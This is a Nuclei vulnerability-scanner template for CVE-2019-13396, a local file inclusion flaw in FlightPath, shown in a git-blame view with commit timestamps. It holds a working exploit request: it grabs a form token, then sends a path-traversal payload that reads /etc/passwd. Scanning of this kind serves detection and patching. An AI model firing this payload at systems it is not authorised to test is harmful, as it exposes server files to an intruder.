2022-01-10 23:58:14 +00:00
|
|
|
id: CVE-2019-13396
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2022-01-10 23:58:14 +00:00
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: FlightPath - Local File Inclusion
|
2022-01-31 18:35:35 +00:00
|
|
|
author: 0x_Akoko,daffainfo
|
2022-05-17 09:18:12 +00:00
|
|
|
severity: medium
|
2022-07-26 13:45:11 +00:00
|
|
|
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
|
2023-09-06 12:53:28 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
2022-01-10 23:58:14 +00:00
|
|
|
reference:
|
2022-01-11 09:13:58 +00:00
|
|
|
- https://www.exploit-db.com/exploits/47121
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://getflightpath.com/node/2650
|
2022-07-26 13:45:11 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
|
2022-01-10 23:58:14 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
|
|
cvss-score: 5.3
|
|
|
|
cve-id: CVE-2019-13396
|
|
|
|
cwe-id: CWE-22
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.02107
|
2023-11-27 09:19:41 +00:00
|
|
|
epss-percentile: 0.87923
|
2023-09-06 12:53:28 +00:00
|
|
|
cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: getflightpath
|
|
|
|
product: flightpath
|
|
|
|
tags: cve,cve2019,flightpath,lfi,edb
|
2022-01-10 23:58:14 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-01-10 23:58:14 +00:00
|
|
|
- raw:
|
2022-01-31 18:35:35 +00:00
|
|
|
- |
|
|
|
|
GET /login HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2022-01-10 23:58:14 +00:00
|
|
|
- |
|
|
|
|
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2022-01-31 18:35:35 +00:00
|
|
|
Accept: application/json, text/plain, */*
|
|
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
2022-01-10 23:58:14 +00:00
|
|
|
|
2022-01-31 18:35:35 +00:00
|
|
|
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
|
2022-01-10 23:58:14 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-01-31 18:35:35 +00:00
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
name: token
|
|
|
|
group: 1
|
|
|
|
regex:
|
|
|
|
- "idden' name='form_token' value='([a-z0-9]+)'>"
|
2023-07-11 19:49:27 +00:00
|
|
|
internal: true
|
|
|
|
part: body
|
2023-11-27 10:10:24 +00:00
|
|
|
# digest: 4a0a00473045022002e396e7a1d63165d8e561a47fa2308ae71dce099f8f1bc1bd59269cc9b2f1e1022100ac8a741a9bda49aa5eccbf1c7199e9739bf056cdc058b46677078b064279e318:922c64590222798bb761d5b6d8e72950
|